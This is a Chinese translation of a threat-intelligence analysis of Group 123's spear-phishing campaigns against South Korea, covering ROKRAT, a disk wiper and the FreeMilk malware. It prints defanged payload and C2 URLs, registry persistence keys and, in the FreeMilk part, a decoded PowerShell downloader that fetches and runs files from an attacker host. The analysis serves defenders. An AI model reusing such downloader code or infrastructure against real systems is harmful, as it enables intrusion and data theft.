當前位置:
首頁 > 新聞 > 黑客攻擊焦點之韓國(上)

黑客攻擊焦點之韓國(上)

一、內容摘要

"Golden Time"

"Evil New Year"

"Are you Happy?"

"FreeMilk"

"North Korean Human Rights"

"Evil New Year 2018"

2018年1月2日,Evil New Year 2018開啟,此行動完全複製了2017年Evil New Year的方法。不同行動之間相互關聯,包括共享的代碼以及諸如PDB(程序資料庫)模式之類的編譯器部件。

據分析,Golden Time、兩個Evil New Year以及North Korean Human Rights行動專門針對韓國用戶。攻擊者結合Hancom Hangul Office Suite創建的惡意HWP文檔,使用魚叉式釣魚郵件。已經明確Group123使用了漏洞(例如CVE-2013-0808)或OLE對象的腳本語言。惡意文檔的目的是安裝並執行遠程管理工具(RAT)ROKRAT。有時攻擊者會直接將ROKRAT payload包含在惡意文檔中,而在其他行動中,攻擊者使用多階段感染過程:文檔只包含一個下載器,用於從攻陷的Web伺服器上下載ROKRAT。

此外,FreeMilk行動還針對數家非韓國金融機構。在該行動中,攻擊者利用了惡意的微軟Office文檔,而不是他們通常使用的Hancom文檔。文檔利用了較新的漏洞CVE-2017-0199,Group 123在漏洞公開披露不到一個月就開始使用了。在該行動中,攻擊者使用了兩個不同的惡意二進位文件:PoohMilk和Freenki,PoohMilk僅用於啟動Freenki,Freenki收集受感染系統的信息並下載後續階段的payload。該惡意軟體已於2016年在多個行動中使用,並與ROKRAT有一些代碼重疊。

最後,我們鎖定了與Group 123相關的第6次行動。我們將第6次活動命名為Are You Happy?。在該行動中,攻擊者部署了一個磁碟擦除器。這次攻擊的目的不僅是為了訪問遠程感染系統,而且還要擦除設備的第一個扇區。經確定擦除器是ROKRAT模塊。

攻擊者今年異常活躍,並持續關注韓國。該組織利用魚叉式釣魚和惡意文檔,其內容包括非常特定的語言,這表明它們是由以韓語為母語的人書寫的,而非翻譯而來。攻擊者具備如下能力:

· 工作流程中包含漏洞(針對Hangul和Microsoft Office)

· 將payload分成多個階段來修正其行動

· 使用攻陷的Web伺服器或合法的雲平台

· 使用HTTPS通信增加流量分析難度

· 為了攻擊第三方打造逼真的魚叉式釣魚行動(即Golden Time中的Yonsei 大學)

· 不斷發展進步,2018年的新無文件功能就是一個證明

二、時間軸

(一)2016.08-2017.03 : GOLDEN TIME

在分析郵件頭部時,我們發現發送該郵件所使用的SMTP伺服器IP與延世大學相關聯。我們認為該電子郵件地址已被攻擊者控制並濫用。

惡意附件的文件名翻譯為「統一北韓會議_調查文檔」,郵件中特別加重了有關統一大會的文字。另外,在郵件正文中,攻擊者甚至告訴完成文檔的人將得到一筆「小費」。也許這就是嵌入式惡意軟體的禮物:

而第二封電子郵件的分析工作簡單的多。這封郵件來自Hanmail,Daum提供的免費韓國郵件服務,沒有像之前描述的那樣嘗試將發件人顯示為官方機構或個人。郵件主題是「請求幫助」,附件名是「我是北韓江原道文川市人」。我們懷疑攻擊者是想提醒讀者,文川市和它所在的江原省,包括韓國的江原道,都歸屬於1945年韓國分裂之前的一個統一的省。

第二封郵件里有一個故事,講的是一個名叫Ewing Kim的人,他在尋求幫助:

附件是兩個不同的HWP文檔,均利用了相同的漏洞(CVE-2013-0808),此漏洞專門針對EPS(封裝的PostScript)格式。shellcode的目的是從互聯網下載一個payload。

第一封電子郵件向受感染用戶顯示下面的誘餌文檔並下載如下payload:

hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg

第二封電子郵件向受感染用戶顯示下面的誘餌文檔,並下載如下payload:

hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg

兩種情形中,下載的payload均是ROKRAT惡意軟體。

這個ROKRAT變種的首要任務是檢查操作系統版本。如果檢測到Windows XP,則惡意軟體將執行無限循環,其目的是在運行Windows XP機器的沙箱系統打開時生成空報表。此外,它還會檢查以確定受感染系統是否正在運行常用分析工具。如果檢測到存在這些工具,惡意軟體會向合法網站發送兩個請求:

hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg

hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4

亞馬遜網址顯示一個名為Men of War的二戰遊戲,而Hulu網址則是名為Golden Time的日本動漫節目:

ROKRAT的特徵之一就是使用社交網路和雲平台與攻擊者進行通信。這些平台是用來傳輸文件和接收命令。以下是該變種使用的平台列表:Twitter,Yandex和Mediafire。樣本中每個平台的令牌都是硬編碼的:

(二)2016.11-2017.01: EVIL NEW YEAR

2017年初,Group123開始了Evil New Year行動。在此次行動中,攻擊者試圖通過冒充來自韓國統一部的電子郵件來欺騙受害者,並專門提供了針對韓國的分析。這次行動從一些針對韓國目標的,包含惡意附件的釣魚郵件開始。下一步,Group 123試圖引誘受害者打開Hancom Hangul文檔附件。Hancom Hangul是一款主要在朝鮮半島使用的辦公套件,使用Hangul辦公文檔符合朝鮮半島的習慣。如果攻擊者使用微軟文檔,可能會引起受害者的懷疑。鑒於所使用的區域文件格式,一些安全軟體套件可能無法很好地檢測這些文件,這就為攻擊者提供了規避機會。

發給目標的文件名為「2017年北方新年分析」,並使用了韓國統一部的官方標誌。這是攻擊者所做的一個簡單決策,進一步表明了他們對該地區的熟悉程度。

這份文檔聲稱要討論朝鮮的新年活動,這可能是韓國的受害者很感興趣的。對於Group123的首選——政府目標而言,更是如此。文檔是一個誘餌,目的是誘使用戶打開嵌入頁面的惡意文檔。

攻擊者嵌入了兩個其它的鏈接,文檔敦促用戶點擊這些鏈接了解有關北韓新年活動的更多信息。第一個鏈接標記為"Comparison of Major Tasks in "16 & "17",第二個鏈接標記為"Comparison between "16 & "17"。

打開這些鏈接後,將給用戶提供另一個誘餌Hangul文檔。文檔寫得很好,進一步增強了我們對新韓國攻擊者的信心。這些文檔包含用於釋放二進位文件的惡意OLE對象。

包含惡意的OLE(對象鏈接嵌入)對象:

初步分析確認文檔中兩個大小相似的OLE對象文件,從執行的角度來看完全相同。依據我們的分析,這兩個釋放的二進位文件被保存在下述位置並執行:

C:UsersADMINI~1AppDataLocalTempHwp (2).exe

C:UsersADMINI~1AppDataLocalTempHwp (3).exe

初步分析顯示,Group123的痕迹清除很馬虎,後來我們藉此來確定單獨的行動是同一個攻擊者所為,因為二進位文件中存在編譯組件:e:HappyWorkSourceversion 12T+MResultDocPrint.pdb。

釋放的二進位文件第二階段用來執行wscript.exe,同時注入shellcode到這此進程中。shellcode被嵌入到資源BIN中,用於解壓縮另一個PE32二進位文件,並使用wscript.exe執行。為此,Group123使用了眾所周知的技術,調用VirtualAllocEx,WriteProcessMemory和CreateRemoteThread這些Windows API。

從shellcode解壓的新PE32是一個初步偵察惡意軟體,用來與C2基礎設施進行通信,獲取最終的payload。此惡意軟體收集的信息包括以下內容:

機器名

用戶名

樣本所在的執行路徑

BIOS模式

唯一標識系統的隨機ID

Group123利用這種方法確定受害者是他們想要進一步針對的人,並基於偵察階段所獲信息確定後續需感染的人。

進一步的網路分析表明,二進位文件試圖連接到以下URL:

www[.]kgls[.]or[.]kr/news2/news_dir/index.php

www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg

韓國政府法律服務(KGLS)是管理韓國政府法律事務的合法政府機構。攻陷KGLS,攻擊者獲得了一個可信賴的平台來執行攻擊。

首先連接index.php,傳輸偵察階段所收集的信息。攻擊者使用這些信息來生成對應於受害者的特定文件名(基於隨機ID)。在本例中該值是02BC6B26 - 這意味著在攻擊者C2上為我們創建了一個02BC6B26_put.jpg文件。然後該文件被投放到受害者的機器上,重命名為officepatch.exe。由於攻擊者特別小心在意攻擊對象,在分析過程中我們沒有獲得該文件。

在調查中,我們確定攻擊者使用的其他命令和控制基礎設施。其中四個C2,分布在以下國家:3個C2 在韓國;1個C2在荷蘭。以下是所確定的基礎設施的全球地圖:

與之前的行動相反,攻擊者將偵察階段從ROKRAT payload中分離出來。此技巧很可能是為了規避檢測。對於Group 123的行為,這是一個有趣的調整。

(三)2017.03:ARE YOU HAPPY?

2017年3月,Group 123 組編寫了磁碟擦除器。該惡意軟體包含1個功能,目的是打開被感染系統的驅動器(\.PhysicalDrive0),並將以下數據寫入MBR:

在寫入緩衝區中可以看到Are you Happy?字元串。寫入MBR後,惡意軟體使用以下命令重啟計算機:c:windowssystem32shutdown /r /t 1。

重新啟動後,MBR向用戶顯示以下字元串:

關聯到其他行動是因為以下PDB路徑:D:HighSchoolversion 13VC2008(Version15)T+MT+MTMProjectReleaseErasePartition.pdb。

正如你所看到的,它完全合乎ROKRAT PDB。擦除器是名為ERSP.enc的ROKRAT模塊。我們假設ERSP意味著ERaSePartition,該模塊可由Group 123按需下載和執行。

樣本很有意思,因為2014年12月韓國發電廠襲擊事件中擦除器顯示的信息是Who Am I?。

(四)2017.05:FREEMILK

此次行動針對非韓國的金融機構,但與其他行動不同,此行動沒有使用HWP文件。它改為使用Office文檔。這個變化是因為Group 123在此次行動中沒有針對南韓,而是針對在世界上以微軟Office為標準的其他地方。

感染載體

攻擊者利用CVE-2017-0199下載並執行Microsoft Office中的惡意HTA文檔。 所使用的URL可在嵌入的OLE對象中找到:

hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]

下面是下載的HTA文檔的源代碼:

Bonjour

id="oHTA"

applicationname="Bonjour"

application="yes"

>

使用base64演算法解碼後,可得到最終的payload:

$c=new-object System.Net.WebClient

$t =$env:temp

$t1=$t+"\alitmp0131.jpg"

$t2=$t+"\alitmp0132.jpg"

$t3=$t+"\alitmp0133.js"

try

{

echo $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg",$t1)

$c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg",$t2)

$c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp",$t3)

wscript.exe $t3

}

catch

{

}

此腳本的目的是下載和執行一個Windows腳本和兩個編碼的payload。腳本用於解碼和執行下列payload:

·Appach01.jpg (renamed: Windows-KB275122-x86.exe) 為 Freenki 樣本

·Appach01.jpg (renamed: Windows-KB271854-x86.exe) 為 PoohMilk 樣本

PoohMilk 分析

創建持久性以便在下次重啟時執行Freenki樣本。

檢查受感染機器上的特定文件。

第一個操作是創建一個註冊表項,以執行先前下載的Windows-KB275122-x86.exe文件,該文件使用參數help執行。下面是註冊表創建:

執行持久性的註冊表位置是:

HKCUSoftwareMicrosoftWindowsCurrentVersionRunWindows Update。在下次重啟時,惡意軟體將被執行。

第二個操作是檢查當前用戶的臨時目錄中是否存在wsatra.tmp文件。如果文件存在,則讀取內容以獲取具有LNK後綴的第二個文件的路徑。LNK文件最終用於識別第三個文件:一個ZIP文件,該文件檢索RTF文檔,並通過寫字板顯示給受感染的用戶。

這是PoohMilk樣本中的pdb路徑:E:BIG_POOHProjectmilkReleasemilk.pdb

Freenki 樣本

Help:由PoohMilk配置的值。在這種情況下,執行main函數。

Console:配置持久性,惡意軟體將在下次重啟時執行( HKCUSoftwareMicrosoftWindowsCurrentVersionRun
unsample)。

Sample: 惡意軟體先執行console命令,然後執行help命令。

使用WMI查詢收集信息:

此外,惡意軟體通過Microsoft Windows API列出正在運行的進程,使用混淆來隱藏諸如URL或User-Agent之類的字元串,演算法基於位運算(SUB 0x0F XOR 0x21),這是解碼後的數據:

hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)

下載的第三個payload使用相同的技術進行混淆,該文件是以PNGF開頭的假圖片。


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

暴雪遊戲存在嚴重遠程控制漏洞,數億用戶受影響

TAG:嘶吼RoarTalk |